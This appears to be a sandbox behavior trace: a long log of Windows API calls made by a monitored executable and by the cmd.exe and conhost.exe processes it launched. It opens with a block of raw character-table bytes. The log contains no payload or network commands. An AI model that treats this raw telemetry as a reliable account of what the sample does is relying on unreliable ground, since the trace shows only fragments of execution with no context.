¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿg$A+äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0242.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x80) returned 0x669230 [0242.214] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0242.214] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0242.214] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x669230) returned 0x80 [0242.214] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0242.214] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0242.214] GetCurrentProcess () returned 0xffffffff [0242.214] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0242.214] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0242.215] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0242.215] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0242.215] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0242.215] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0242.215] LockResource (hResData=0x43c648) returned 0x43c648 [0242.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x669700 [0242.215] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0242.215] GetLastError () returned 0x20 [0242.216] GetLastError () returned 0x20 [0242.216] SetLastError (dwErrCode=0x20) [0242.216] GetLastError () returned 0x20 [0242.216] SetLastError (dwErrCode=0x20) [0242.216] GetLastError () returned 0x20 [0242.216] SetLastError (dwErrCode=0x20) [0242.216] GetLastError () returned 0x20 [0242.216] SetLastError (dwErrCode=0x20) [0242.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1000) returned 0x669720 [0242.216] GetLastError () returned 0x20 [0242.216] SetLastError (dwErrCode=0x20) [0242.216] GetLastError () returned 0x20 [0242.216] SetLastError (dwErrCode=0x20) [0242.217] GetLastError () returned 0x20 [0242.217] SetLastError (dwErrCode=0x20) [0242.217] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0242.217] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0242.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x668800 | out: hHeap=0x650000) returned 1 [0242.220] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0242.220] ExitProcess (uExitCode=0x1) [0242.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6670a0 | out: hHeap=0x650000) returned 1 Process: id = "264" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1e962000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 876 os_tid = 0x490 Thread: id = 880 os_tid = 0x5b4 Thread: id = 884 os_tid = 0xa94 Process: id = "265" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x27835000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "234" os_parent_pid = "0x7c4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 881 os_tid = 0xa34 [0242.396] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fa4c | out: lpSystemTimeAsFileTime=0x22fa4c*(dwLowDateTime=0x46415960, dwHighDateTime=0x1d68287)) [0242.396] GetCurrentProcessId () returned 0xaec [0242.396] GetCurrentThreadId () returned 0xa34 [0242.396] GetTickCount () returned 0x1167639 [0242.396] QueryPerformanceCounter (in: lpPerformanceCount=0x22fa44 | out: lpPerformanceCount=0x22fa44*=36273481175) returned 1 [0242.397] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0242.398] __set_app_type (_Type=0x1) [0242.398] __p__fmode () returned 0x770331f4 [0242.398] __p__commode () returned 0x770331fc [0242.398] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0242.398] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0242.398] GetCurrentThreadId () returned 0xa34 [0242.398] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa34) returned 0x60 [0242.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0242.398] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0242.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0242.400] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0242.401] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f9dc | out: phkResult=0x22f9dc*=0x0) returned 0x2 [0242.401] VirtualQuery (in: lpAddress=0x22fa13, lpBuffer=0x22f9ac, dwLength=0x1c | out: lpBuffer=0x22f9ac*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0242.401] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f9ac, dwLength=0x1c | out: lpBuffer=0x22f9ac*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0242.401] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f9ac, dwLength=0x1c | out: lpBuffer=0x22f9ac*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0242.401] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f9ac, dwLength=0x1c | out: lpBuffer=0x22f9ac*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0242.401] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f9ac, dwLength=0x1c | out: lpBuffer=0x22f9ac*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0242.401] GetConsoleOutputCP () returned 0x1b5 [0242.402] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0242.402] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0242.402] _get_osfhandle (_FileHandle=1) returned 0x80 [0242.402] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0242.422] _get_osfhandle (_FileHandle=1) returned 0x80 [0242.422] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0242.422] _get_osfhandle (_FileHandle=0) returned 0x3 [0242.422] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0242.423] GetEnvironmentStringsW () returned 0x4621d0* [0242.423] GetProcessHeap () returned 0x450000 [0242.423] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb7e) returned 0x462d58 [0242.424] FreeEnvironmentStringsW (penv=0x4621d0) returned 1 [0242.424] GetProcessHeap () returned 0x450000 [0242.424] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4) returned 0x4618b0 [0242.424] GetEnvironmentStringsW () returned 0x4621d0* [0242.424] GetProcessHeap () returned 0x450000 [0242.424] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb7e) returned 0x4638e0 [0242.424] FreeEnvironmentStringsW (penv=0x4621d0) returned 1 [0242.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e94c | out: phkResult=0x22e94c*=0x68) returned 0x0 [0242.424] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x0, lpData=0x22e958*=0x0, lpcbData=0x22e950*=0x1000) returned 0x2 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x1, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x0, lpData=0x22e958*=0x1, lpcbData=0x22e950*=0x1000) returned 0x2 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x0, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x40, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x40, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x0, lpData=0x22e958*=0x40, lpcbData=0x22e950*=0x1000) returned 0x2 [0242.425] RegCloseKey (hKey=0x68) returned 0x0 [0242.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e94c | out: phkResult=0x22e94c*=0x68) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x0, lpData=0x22e958*=0x40, lpcbData=0x22e950*=0x1000) returned 0x2 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x1, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x0, lpData=0x22e958*=0x1, lpcbData=0x22e950*=0x1000) returned 0x2 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x0, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x9, lpcbData=0x22e950*=0x4) returned 0x0 [0242.425] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x4, lpData=0x22e958*=0x9, lpcbData=0x22e950*=0x4) returned 0x0 [0242.426] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e954, lpData=0x22e958, lpcbData=0x22e950*=0x1000 | out: lpType=0x22e954*=0x0, lpData=0x22e958*=0x9, lpcbData=0x22e950*=0x1000) returned 0x2 [0242.426] RegCloseKey (hKey=0x68) returned 0x0 [0242.426] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e308 [0242.426] srand (_Seed=0x5f51e308) [0242.426] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner" [0242.426] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"WinMail.exe\" -nobanner" [0242.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0242.427] GetProcessHeap () returned 0x450000 [0242.427] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x210) returned 0x464468 [0242.427] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x464470, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0242.427] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0242.427] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0242.427] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0242.427] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0242.427] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0242.427] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0242.427] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0242.427] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0242.427] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0242.427] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0242.427] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0242.427] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0242.428] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0242.428] GetProcessHeap () returned 0x450000 [0242.428] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x54) returned 0x464680 [0242.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f718 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0242.428] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f718, lpFilePart=0x22f714 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f714*="Desktop") returned 0x25 [0242.428] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0242.428] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f494 | out: lpFindFileData=0x22f494*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x462050 [0242.428] FindClose (in: hFindFile=0x462050 | out: hFindFile=0x462050) returned 1 [0242.428] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f494 | out: lpFindFileData=0x22f494*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x462050 [0242.428] FindClose (in: hFindFile=0x462050 | out: hFindFile=0x462050) returned 1 [0242.428] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0242.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f494 | out: lpFindFileData=0x22f494*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x462050 [0242.429] FindClose (in: hFindFile=0x462050 | out: hFindFile=0x462050) returned 1 [0242.429] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0242.429] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0242.429] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0242.429] GetProcessHeap () returned 0x450000 [0242.429] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x462d58 | out: hHeap=0x450000) returned 1 [0242.429] GetEnvironmentStringsW () returned 0x4621d0* [0242.429] GetProcessHeap () returned 0x450000 [0242.429] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb7e) returned 0x462d58 [0242.429] FreeEnvironmentStringsW (penv=0x4621d0) returned 1 [0242.429] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0242.429] GetProcessHeap () returned 0x450000 [0242.429] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464680 | out: hHeap=0x450000) returned 1 [0242.429] GetProcessHeap () returned 0x450000 [0242.429] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x400e) returned 0x464ee0 [0242.430] GetProcessHeap () returned 0x450000 [0242.430] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x6e) returned 0x4621d0 [0242.430] GetProcessHeap () returned 0x450000 [0242.430] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464ee0 | out: hHeap=0x450000) returned 1 [0242.430] GetConsoleOutputCP () returned 0x1b5 [0242.431] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0242.431] GetUserDefaultLCID () returned 0x409 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f858, cchData=128 | out: lpLCData="0") returned 2 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f858, cchData=128 | out: lpLCData="0") returned 2 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f858, cchData=128 | out: lpLCData="1") returned 2 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0242.432] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0242.432] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0242.434] GetProcessHeap () returned 0x450000 [0242.434] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20c) returned 0x462248 [0242.434] GetConsoleTitleW (in: lpConsoleTitle=0x462248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0242.672] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0242.672] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0242.672] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0242.672] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0242.673] GetProcessHeap () returned 0x450000 [0242.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x400a) returned 0x464ee0 [0242.673] GetProcessHeap () returned 0x450000 [0242.673] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464ee0 | out: hHeap=0x450000) returned 1 [0242.675] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0242.675] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0242.675] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0242.675] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0242.675] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0242.675] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0242.675] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0242.675] GetProcessHeap () returned 0x450000 [0242.675] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x58) returned 0x464680 [0242.675] GetProcessHeap () returned 0x450000 [0242.675] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x22) returned 0x462460 [0242.676] GetProcessHeap () returned 0x450000 [0242.676] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x52) returned 0x462490 [0242.677] GetConsoleTitleW (in: lpConsoleTitle=0x22f550, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0242.678] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0242.678] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0242.678] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 